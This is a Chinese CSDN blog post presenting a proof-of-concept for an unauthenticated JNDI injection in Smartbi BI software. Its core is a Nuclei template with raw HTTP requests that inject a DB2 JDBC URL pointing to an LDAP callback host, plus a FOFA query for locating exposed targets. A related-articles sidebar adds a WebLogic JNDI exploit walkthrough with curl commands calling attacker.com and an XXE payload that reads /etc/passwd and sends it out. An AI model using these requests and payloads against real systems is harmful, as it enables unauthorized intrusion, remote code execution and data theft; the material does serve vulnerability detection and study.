Smartbi DB2 params JNDI注入漏洞

已于 2023-12-17 19:06:19 修改
阅读量536 收藏 8
点赞数 10
分类专栏: 漏洞POC 文章标签: 安全 测试工具
于 2023-12-17 18:09:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45936921/article/details/135047699
版权

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

Smartbi 是思迈特软件推出的商业智能BI软件,Smartbi存在未授权访问后台接口漏洞,结合 DB2 JDBC 利用方式,可导致 JNDI 注入漏洞。

漏洞影响

  • 未知

网络测绘

  • FOFA:app="SMARTBI" ||body="gcfutil = jsloader.resolve('smartbi.gcf.gcfutil')"

漏洞复现

直接测试存在漏洞

使用其它DNSlog进行OOB测试

漏洞POC

id: smartbi-db2-params-rce

info:
  name: smartbi-db2-params-rce
  author: linfeng7z
  severity: critical
  description: Smartbi 是思迈特软件推出的商业智能BI软件,Smartbi存在未授权访问后台接口漏洞,结合 DB2 JDBC 利用方式,可导致 JNDI 注入漏洞。
  tags: smartbi,rce
  metadata:
    fofa-qeury: app="SMARTBI" || body="gcfutil = jsloader.resolve('smartbi.gcf.gcfutil')"
    veified: true
    max-request: 2

http:
  - raw:
      - |
        GET /vision/index.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

      - |
        @timeout: 5s       
        POST //vision/.stub?className=DataSourceService&methodName=testConnection&params=%5B%7B%22driverType%22%3A%22aaa%22%2C%22driver%22%3A%22com.ibm.db2.jcc.DB2Driver%22%2C%22maxConnection%22%3A1%2C%22transactionIsolation%22%3A1%2C%22validationQueryMethod%22%3A3%2C%22url%22%3A%22jdbc%3Adb2%3A%2F%2F127.0.0.1%3A18080%2Fa%3AclientRerouteServerListJNDIName%3Dldap%3A%2F%2F{{interactsh-url}}%22%7D%5D HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"
linfeng7z
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Smartbi 权限绕过漏洞复现(QVD-2023-17461)
0xSec
08-09 2746
Smartbi在特定情况下可被获取用户token,未经授权的攻击者可通过这种方式获取管理员权限,从而以管理员权限接管后台,进一步利用可实现任意代码执行。利用此漏洞需目标可出网。
【高危】Smartbi 登录代码逻辑漏洞
murphysec的博客
07-24 326
Smartbi是一款企业级商业智能与大数据分析平台。由于Smartbi登录代码存在逻辑缺陷,攻击者可利用该漏洞登录管理员账号,进而利用系统后台加载扩展包功能执行任意代码。
Smartbi 身份认证绕过漏洞
蚁景网安学院
07-25 288
因为自己搭建的环境存在一些问题,可能是版本过高的原因,(奇奇怪怪的问题,用户没有权限),所以目前仅仅做概念性验证,对漏洞的原理进行分析。
【严重】Smartbi商业智能BI软件权限绕过漏洞
murphysec的博客
08-02 462
Smartbi是一款商业智能应用,提供了数据集成、分析、可视化等功能,帮助用户理解和使用他们的数据进行决策。在Smartbi受影响版本中存在权限绕过问题,未授权的攻击者可以通过 RMI 的方式调用 getPassword 接口获取管理员token信息。获取管理员权限后,可进入后台实现任意命令执行,进而对目标系统造成破坏或篡改窃取敏感信息。
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,...
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar ...
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用...
JNDI注入学习1
08-03
JNDI注入漏洞通常发生在应用程序使用`InitialContext.lookup()`方法进行查找时,如果这个查找的URI(统一资源标识符)是由用户输入控制的,攻击者就可以构造恶意URI来执行任意代码。攻击过程通常包含以下步骤: 1. ...
WAS JNDI DB2 XA 连接池配置
04-17
在IBM WebSphere Application Server (WAS) 中配置JNDI(Java Naming and Directory Interface)以连接到DB2数据库,涉及到的关键技术主要包括JNDIDB2数据库连接池以及相关的驱动jar包。以下将详细讲解这些知识点...
Smartbi内置用户登陆绕过漏洞
holyxp的博客
07-25 700
Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。​ Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。
Smartbi权限绕过漏洞
m0_49025459的博客
08-24 514
该文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。
Smartbi:常见Web应用安全漏洞原理与防御介绍
思迈特Smartbi
06-15 767
Web应用是指采用B/S架构、通过HTTP/HTTPS协议提供服务的统称。随着互联网的普及,Web应用已经融入到我们生活中的方方面面。在企业信息化的过程中,越来越多的应用也都架设在Web平台上。在这些Web访问中,大多数应用不是静态的网页浏览,而是涉及到服务器侧的动态处理。此时,如果技术人员的安全意识不足,例如对程序参数输入等检查不严格,就会导致Web应用安全问题层出不穷。轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这使得越来越多的用户关注应用层的安全
Smartbi 内置用户登陆绕过漏洞
whoami
08-02 455
Smartbi 大数据分析产品融合 BI 定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。Smartbi 在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。其中params用户可以为public service system其中一个。0a为默认密码的表示。
漏洞复现--Smartbi smartbivisionRMIServlet 接口权限绕过漏洞
qq_53003652的博客
12-18 913
Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现,满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。该产品存在接口绕过漏洞,攻击者可通过此漏洞绕过登录流程。获取到的cookie为管理用户,可直接利用进入后台。
漏洞复现 || Smartbi 远程命令执行(1Day)
失心少年
07-06 2111
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Smartbi在远程未授权身份认证的情况下,可在绕过用户身份认证机制后未授权访问windowsunloging接口,且该接口存在反序列化远程代码执行漏洞随后可使用获取的身份凭证调用后台接口最终导致代码执行。
关于Smartbi登录代码逻辑漏洞的动态情报
最新发布
zmcxyyds的博客
12-25 1421
关于Smartbi登录代码逻辑漏洞的动态情报
weblogic jndi注入漏洞利用
12-11
WebLogic 的/console/consolejndi.portal接口可以调用存在 JNDI 注入漏洞的com.bea.console.handles.JndiBindingHandle类,从而造成 RCE。攻击者可以通过构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上,从而实现远程代码执行。具体步骤如下: 1. 构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上。例如,可以使用以下命令将一个恶意的 LDAP URL 绑定到 WebLogic JNDI 树上: ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "ldap://attacker.com:1389/Exploit", "targets": [{"identity": {"type": "Server", "name": "AdminServer"}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 2. 构造恶意请求,触发 JNDI 注入漏洞。例如,可以使用以下命令触发漏洞: ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "Exploit", "bindings": [{"name": "Exploit", "type": "javax.naming.Reference", "value": {"className": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryClassName": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryMethodName": "setConfigLocation", "factoryMethodArgs": ["http://attacker.com/evil.xml"]}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 3. 在攻击者控制的服务器上,启动一个 HTTP 服务器,将恶意的 XML 文件放到该服务器上。例如,可以使用以下命令启动一个 Python HTTP 服务器: ``` python -m SimpleHTTPServer 80 ``` 4. 构造恶意的 XML 文件,该文件将在 WebLogic 服务器上执行恶意代码。例如,可以使用以下 XML 文件: ``` <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> ``` 5. 在攻击者控制的服务器上,启动一个 HTTP 服务器,将恶意的 DTD 文件放到该服务器上。例如,可以使用以下命令启动一个 Python HTTP 服务器: ``` python -m SimpleHTTPServer 80 ``` 6. 构造恶意的 DTD 文件,该文件将在 WebLogic 服务器上执行恶意代码。例如,可以使用以下 DTD 文件: ``` <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % remote "<!ENTITY % send SYSTEM 'http://attacker.com/?%payload;'>"> %remote; ``` 7. 等待 WebLogic 服务器向攻击者控制的服务器发送 HTTP 请求,从而触发恶意代码的执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值